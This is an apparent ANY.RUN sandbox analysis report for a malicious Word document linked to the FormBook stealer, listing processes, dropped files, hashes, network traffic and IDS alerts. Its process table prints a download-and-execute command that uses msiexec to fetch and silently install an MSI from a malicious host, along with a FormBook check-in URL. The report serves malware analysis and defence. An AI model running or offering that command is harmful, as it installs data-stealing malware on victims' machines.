File name: | BT9908 (3).doc |
Full analysis: | https://app.any.run/tasks/6b59f296-f7aa-4f8c-bf31-f7e37543fe89 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | December 14, 2018, 06:54:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF, LF line terminators |
MD5: | 27FED39EABD7DDF7ECB47B5E3C47956B |
SHA1: | 94127DE5B091E25ED1D3D5F8D99EA6C67E14E080 |
SHA256: | D0D19523727F97ADB1F1EC7D264617221515454456FE30BAF04FC034F2247B1D |
SSDEEP: | 6144:K7p1JMaod5lxuOWQcP9jE+b6MK1FSKO0SbLlCX+jv7yqET7rNeCLqWuJQBPxNNpH:j |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2824 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\BT9908 (3).doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3204 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
3900 | cmd.exe & /C CD C: & msiexec.exe /i http://haial.xyz/grandfinal/fa25d0.msi /quiet | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2272 | msiexec.exe /i http://haial.xyz/grandfinal/fa25d0.msi /quiet | C:\Windows\system32\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3428 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3888 | "C:\Windows\Installer\MSIAB9B.tmp" | C:\Windows\Installer\MSIAB9B.tmp | — | msiexec.exe |
User: admin Company: NICrOsOFt Integrity Level: MEDIUM Description: Brest_8 Exit code: 0 Version: 1.00 | ||||
3040 | "C:\Windows\Installer\MSIAB9B.tmp" | C:\Windows\Installer\MSIAB9B.tmp | — | MSIAB9B.tmp |
User: admin Company: NICrOsOFt Integrity Level: MEDIUM Description: Brest_8 Exit code: 0 Version: 1.00 | ||||
2624 | "C:\Windows\System32\cmmon32.exe" | C:\Windows\System32\cmmon32.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Monitor Version: 7.02.7600.16385 (win7_rtm.090713-1255) | ||||
3776 | /c del "C:\Windows\Installer\MSIAB9B.tmp" | C:\Windows\System32\cmd.exe | — | cmmon32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
116 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR984E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3428 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DFFD9B706681EF7938.TMP | — | |
MD5:— | SHA256:— | |||
3428 | msiexec.exe | C:\Config.Msi\19a8ea.rbs | — | |
MD5:— | SHA256:— | |||
3428 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF1D4C562C3BDD1270.TMP | — | |
MD5:— | SHA256:— | |||
3428 | msiexec.exe | C:\Windows\Installer\MSIA5CB.tmp | executable | |
MD5:E909994C42FC31E88E7C0FB62AE02F60 | SHA256:8A7D5D2EC2C5F1D5D8E9E724B5C76348BE71B06D6EF6BBBA70061F986A6478F8 | |||
2824 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:0FEE22FA40EAB618E269AF59EF990721 | SHA256:DB543AC7F35DE26670D8A65A74DD48BCF6E5E70FF2A75D8A42E2FD500F8A170D | |||
3428 | msiexec.exe | C:\Windows\Installer\MSIAB9B.tmp | executable | |
MD5:E9784C80006C3BF538318E1B4CCDCA01 | SHA256:B7D3B685114ABE06E70B7BDB0CDEA59A21D5DA9783F646730F96FDF6D85FCB77 | |||
3428 | msiexec.exe | C:\Windows\Installer\MSIA9A5.tmp | binary | |
MD5:B9B93AC2A0F66247B52D132837A095B9 | SHA256:FF63BD0B832619766AF5AE73C30C4F93745792F7698AEA448A0B8D2782AF2972 | |||
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$9908 (3).doc | pgc | |
MD5:C5DAD2BF8F99FA9695119DA6038A60D3 | SHA256:F65FC11FCC01801158C44CB790834173F28D5580E5A59D8781DB02705194103C | |||
3428 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\History\History.IE5\desktop.ini | ini | |
MD5:BA96961F5E22882527919E19DAEA510F | SHA256:DACE5AD59099429D8AED4EE279F1263EFB65D64456931398465A396CF0E79BD7 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
116 | explorer.exe | GET | 302 | 23.20.239.12:80 | http://www.penelopespearls.com/hu/?MfPxV=Anmp8v5JMixf6K7MmOfQIXGEZwBX4MRgE4YRZrD7R80uaOXEtv42iVNUQkoH6byBP6uJpw==&rV1H7=lhd01ng8QZc | US | html | 191 b | shared |
3428 | msiexec.exe | GET | 200 | 89.40.119.248:80 | http://haial.xyz/grandfinal/fa25d0.msi | DE | executable | 920 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3428 | msiexec.exe | 89.40.119.248:80 | haial.xyz | Aruba SAS | DE | suspicious |
116 | explorer.exe | 23.20.239.12:80 | www.penelopespearls.com | Amazon.com, Inc. | US | shared |
Domain | IP | Reputation |
---|---|---|
haial.xyz |
| malicious |
www.penelopespearls.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3428 | msiexec.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic |
3428 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download |
3428 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable ExeToMSI Download |
116 | explorer.exe | A Network Trojan was detected | SC SPYWARE Trojan-Spy.Win32.Noon |
116 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |